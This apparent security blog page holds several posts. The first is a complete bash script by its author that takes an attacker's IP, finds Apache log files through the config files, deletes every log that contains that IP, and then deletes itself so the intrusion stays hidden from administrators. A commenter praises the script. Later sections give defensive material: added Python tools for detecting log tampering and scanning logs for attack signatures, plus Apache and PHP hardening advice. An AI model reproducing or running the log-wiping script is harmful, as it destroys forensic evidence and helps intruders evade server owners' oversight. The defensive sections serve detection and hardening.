Hiding an attack by clearing log files in Unix / Linux

Hey! I'm back after some university exams :D and ....

Here is a bash script that finds the paths of log files (Apache first, and soon all logs) and deletes them, so that an attacker stays hidden from the server admins. Not bad? Not good? Where would you use that?

First we find the path of the directory that contains the wanted logs, then we search it line by line for log paths, and finally we look for the attacker's IP in those log files and remove any log file that contains it. Be happy!

Tested on Debian etch 4.0 and FreeBSD 6.*

This is RC 1. [download]: Log_f

and here is the source code in bash:

#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
 
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
 
echo "Enter attacker IP"
read -e ip
 
if [ "`find $path -name apache >> $fl`" ];then
	echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
 
	if [ "`find $path -name apache2 >> $fl`" ];then
		echo "Founded Apache2 Config files"
	fi
fi 
 
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
 
#########################################################
if [ -f $1 ];then
let "f=f+1"
	if [ "`ls $1 | grep -F .conf`" ];then
	let "t=t+1"
	cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2  >> $log_path
	nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
	echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
	let "nt=nt+${nom[$t]}"
	let "j=$nt+$t"
	fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files  :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found  :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found  :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total  :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
 
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
	recurse $line
fi
let "l=l+1"
done
}
 
reader
 
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`"	\033[1;30m] $ip in	"
echo -n "Removing $line"
rm $line
 
if [ ! -f $line ];then
echo -e "\033[1;39m	... Done !\033[0;0m"
else
echo -e "\033[1;31m	...Failed!\033[1;0m"
fi
 
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line    "\033[1;39mFile Dose not exist......\033[1;30m]"
fi
 
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m"
 
log_path_reader
 
echo -en "\033[1;30mRemoving 				   $0	"
 
rm $fl $log_path $0
 
 if [ ! -f  $0 ];then
 	echo -e "\033[1;39m	... Done !\033[0;0m"
 else
 	echo -e "\033[1;31m	...Failed!\033[1;0m"
 fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"
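From the defender's side, the same config walk can serve as a tamper check. The following Python is an added example, not the post's script: it reads the log paths named by ErrorLog/CustomLog/TransferLog directives, records each file's inode and size, and later reports logs that went missing, were replaced or shrank. All paths and sample content are constructed.

```python
# Added example (not the post's script): the wiper above deletes the log files
# named in Apache config. This defender-side check reads the same directives,
# records (inode, size) per log file and later reports files that vanished,
# were replaced or shrank. All paths and sample content here are constructed.
import os
import re
import tempfile

LOG_DIRECTIVE = re.compile(r'^\s*(ErrorLog|CustomLog|TransferLog)\s+"?([^\s"]+)"?', re.I)

def extract_log_paths(config_text):
    """Paths named by log directives; comments and piped loggers are skipped."""
    paths = []
    for line in config_text.splitlines():
        m = LOG_DIRECTIVE.match(line)
        if m and not m.group(2).startswith("|"):
            paths.append(m.group(2))
    return paths

def _stat(path):
    # (inode, size) of a file, or None if it does not exist
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return (st.st_ino, st.st_size)

def _status(old, now):
    if old is None or now is None:
        return "missing"      # deleted, exactly what the wiper does
    if now[0] != old[0]:
        return "replaced"     # rm + recreate, or legitimate rotation
    if now[1] < old[1]:
        return "truncated"    # shrank since the baseline was taken
    return "ok"

def check_logs(baseline):
    """Compare the current state with a {path: (inode, size)} baseline."""
    return {p: _status(old, _stat(p)) for p, old in baseline.items()}

def demo():
    """Constructed scenario: the access log is deleted, the error log truncated."""
    d = tempfile.mkdtemp()
    access, error = os.path.join(d, "access.log"), os.path.join(d, "error.log")
    for p in (access, error):
        with open(p, "w") as fh:
            fh.write('10.0.0.5 - - [01/Jan/2008:00:00:00 +0000] "GET / HTTP/1.0" 200 12\n')
    conf = f'ErrorLog "{error}"\n# CustomLog /old.log combined\nCustomLog {access} combined\n'
    base = {p: _stat(p) for p in extract_log_paths(conf)}   # keep this off-host in practice
    os.remove(access)
    open(error, "w").close()
    return check_logs(base)
```

Run the baseline from cron into a location the web server user cannot write, and treat "missing" or "truncated" outside your rotation window as an incident signal.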

—————————————————

daphne  :

Hi readers .

Thanks to Mr. Amiri.

When we're talking about secrecy or hiding on a server, the log files on Unix / Linux servers record everything. This script is useful for [white hackers] and managers to clear the major log files.

Apache log parser script

Hello viewers
For a long time I was looking for some code for monitoring Apache's logs
to detect some attacks and/or some errors, which can help server administrators to have a security solution for web servers.

So it is simple to find, but it's so dirty :D.
In the first stage the script checks the number of signatures of some public attacks; you can change and/or edit them. After counting the errors the script shows you an alarm, attention or .... message, and here you decide what you want to do...
And at last a total summary of the logs with details is saved to a path....
I want to write better code as soon as possible ;)

Here is a snapshot of the quick log check

and the check details

The last code was so slow and heavy. This one is faster than the beta-1 code.
I checked a log file of ~150 MB and got the results in 5 min.
It is as fast as possible ;) thanks.

Download the source code (beta 2, cleaned and optimized code):

download: log parser
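The first stage described above, as an added Python example that is not the post's downloadable parser: it parses Apache combined-format lines, counts hits for a few editable attack signatures per client IP, tallies 5xx errors and raises an alarm once one IP passes a threshold. The signatures, threshold and log lines are all constructed.

```python
# Added example (not the post's downloadable parser): a minimal version of the
# first stage it describes. It parses Apache combined-format lines, counts hits
# for a few editable attack signatures per client IP, tallies server errors and
# raises an alarm past a threshold. The log lines and signatures are constructed.
import re
from collections import Counter, defaultdict

# host ident user [time] "request" status bytes ...  (combined log format)
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')
# Signature name -> regex applied to the request line; edit or extend as needed.
SIGNATURES = {
    "dir_traversal": re.compile(r"\.\./|%2e%2e", re.I),
    "sql_injection": re.compile(r"union\s+select|'\s*or\s+1=1", re.I),
    "php_shell": re.compile(r"c99\.php|r57\.php", re.I),
}
ALARM_THRESHOLD = 3   # signature hits from one IP before we raise an alarm

def parse_line(line):
    """(ip, request, status) for a combined-format line, None otherwise."""
    m = LINE.match(line)
    return (m.group(1), m.group(3), int(m.group(4))) if m else None

def scan(lines):
    """Count signature hits per IP and 5xx errors; return a summary dict."""
    per_ip, errors, malformed = defaultdict(Counter), Counter(), 0
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:          # not a log entry: count it, do not crash
            malformed += 1
            continue
        ip, request, status = parsed
        if status >= 500:
            errors[ip] += 1
        for name, rx in SIGNATURES.items():
            if rx.search(request):
                per_ip[ip][name] += 1
    alarms = [ip for ip, c in per_ip.items() if sum(c.values()) >= ALARM_THRESHOLD]
    return {"hits": {ip: dict(c) for ip, c in per_ip.items()},
            "server_errors": dict(errors), "malformed": malformed, "alarms": alarms}

SAMPLE_LOG = """192.0.2.10 - - [10/Oct/2008:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "Mozilla"
198.51.100.7 - - [10/Oct/2008:13:55:40 +0000] "GET /../../etc/passwd HTTP/1.1" 404 200 "-" "curl"
198.51.100.7 - - [10/Oct/2008:13:55:41 +0000] "GET /news.php?id=1 UNION SELECT 1,2 HTTP/1.1" 500 0 "-" "curl"
198.51.100.7 - - [10/Oct/2008:13:55:42 +0000] "GET /c99.php HTTP/1.1" 404 200 "-" "curl"
this line is not a log entry
"""

if __name__ == "__main__":
    print(scan(SAMPLE_LOG.splitlines()))
```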

Is your Apache in safe mode ?

This post is a brief review of Apache security and does not contain all the details, but I want to write all of them.

When you decide to build a web server based on an open source OS for web publishing, public or private, not all of the features are needed. But sometimes some of them must be changed carefully. We have two cases of Apache usage here:

Case 1: In some cases you need to build a simulated FTP server based on the HTTP protocol.

Case 2: You need to build a mail server with an HTTP interface, such as Horde or SquirrelMail.

So what changes are needed? What kind of features are usable here for your job?

In a default installation of Apache, a very useful web server, on a wide range of open source operating systems you may see auto-indexing and directory browsing enabled. That is good for an HTTP server acting as an FTP server, but is it usable for an HTTP mail server? Of course the answer is NO. Why? It's simple. In case 1 you just need to give your users permission to read files and browse directories, and ONLY that, and deny them reading or browsing any other directories. In case 2 the server design may have a configuration complete with case 1. Here you must use an interpreter for your scripts and language. So if your directory browsing option is not denied, what becomes possible? For example, an attacker can change his directory to an upper one, or see the most important data such as the web server configuration and/or some log files, or a high-level script kiddie could copy your password file anywhere. Now your web server is really crackable, and an attacker can read your configuration and may even change it! So what do you do? That is a good question.

1- You can change the permissions of all unneeded directories to deny other users and groups, like:

"[root@server] # chmod -R 700 <some directory that you want to hide from others>"

2- Change the permissions of your files to be only readable by www and not executable, if you use HTML pages, and for script-based pages

do "[root@server]# chmod 644 *.php" (or other scripts)
3- If your server pages are PHP you can change the php.ini file a bit.

On my machine it is:

[root@t4yt4n1 /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[root@t4yt4n1 /usr/home/t4z3v4r3d]#

Set open_basedir = /usr/local/www, that is, to your www directory; this is the way to block some PHP shell scripts like c99.php.
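To check that steps 1 to 3 were actually applied, here is an added Python audit that is not from the post: it reads open_basedir from php.ini text, checks that it confines PHP to the www directory rather than "/", and flags files under the document root that are group/other-writable or executable (the 644 rule above). The ini text, paths and files are constructed.

```python
# Added example (not from the post): an audit of the three steps above. It reads
# open_basedir from php.ini text, checks that it actually confines PHP to the
# document root, and walks that root flagging files that are group/other-writable
# or executable (the post wants 644). The ini text and files are constructed.
import os
import re
import stat
import tempfile

OPEN_BASEDIR = re.compile(r'^\s*open_basedir\s*=\s*"?([^"\s]+)"?')
BAD_BITS = stat.S_IWGRP | stat.S_IWOTH | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH

def read_open_basedir(ini_text):
    """Value of open_basedir, ignoring ';' comment lines; None if unset."""
    for line in ini_text.splitlines():
        m = OPEN_BASEDIR.match(line)
        if m and not line.lstrip().startswith(";"):
            return m.group(1)
    return None

def basedir_ok(basedir, docroot):
    """open_basedir is set, is not '/', and one of its entries contains docroot."""
    if not basedir:
        return False
    entries = [os.path.normpath(e) for e in basedir.split(":")]
    root = os.path.normpath(docroot)
    return "/" not in entries and any(root == e or root.startswith(e + "/") for e in entries)

def audit_perms(docroot):
    """Files under docroot with mode bits the post says to remove: {relpath: mode}."""
    bad = {}
    for dirpath, _, files in os.walk(docroot):
        for f in files:
            p = os.path.join(dirpath, f)
            mode = stat.S_IMODE(os.lstat(p).st_mode)
            if mode & BAD_BITS:
                bad[os.path.relpath(p, docroot)] = oct(mode)
    return bad

def demo():
    """Constructed docroot: index.php at 644 passes, upload/shell.php at 777 is flagged."""
    root = tempfile.mkdtemp()
    for name, mode in (("index.php", 0o644), ("upload/shell.php", 0o777)):
        p = os.path.join(root, name)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        open(p, "w").close()
        os.chmod(p, mode)
    ini = "; open_basedir, if set, limits all file operations\nopen_basedir = %s\n" % root
    return basedir_ok(read_open_basedir(ini), root), audit_perms(root)
```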

What can the PHP shells do?

Hi, this is the 2nd part of Apache security.
We want to look at how to keep all of our scripts safe when we host several sites.
On shared servers (commercial servers) we can secure our server with some applications such as cPanel, Plesk, etc.
But how can we secure it by hand? Of course it's not so simple, but it's not hard to do.
OK, let's see what we can do. Let's look at this how-to from an attacker's side.
Any attacker wants to get some information before carrying out a successful attack on a server.
But what information exactly? Yes, any information, that's correct! All information may help the attacker get into your server.
What kind of web server, the web server version, the OS version and type, which modules of your web server are running, the server admin's mail, the DNS server, and .... is all good information for starting an attack.

Some of this information can't be hidden, but some of it can!
OK, we can change our server's operating system name, and the web server's name, type and version, with some tools and mods (soon).

All attack methods depend on the security of your server.

OK, we have made some changes to our Apache configuration.
But is it enough? In the same way: what is the set of security settings for
Apache? Security is a collection of invisible or small notes. You can't deny web viewers looking at your web content within a short range of time; in fact you can't tell users "browse my web content only once", but you can deny them browsing the whole site in a short range of time, or attacking with directory traversal attacks or denial of service attacks. Such an attack can consume a large amount of server resources; you can detect this attack and ban the attacker. Apache is now developed as a set of modules, and we can select the modules we need for protection.
Modules can be helpful tools if you have enough information about how each module works. Apache has 3 release versions: 1.3.X, 2.0.X and 2.X; all of these versions can use some modules.
For any platform you want to work on, you may need some changes in the configuration, giving resources to the web server, changing firewall rules, etc. But you are the module selector and you are the lord of the Apache world. Deciding which modules are needed is your job, and tuning Apache is your art.
This is the end of section one for now, because I have no time to continue. I'll be back very soon; I want to build an HTTP server on my BSD box, and all of these notes are real. In the next section we will look at the details.
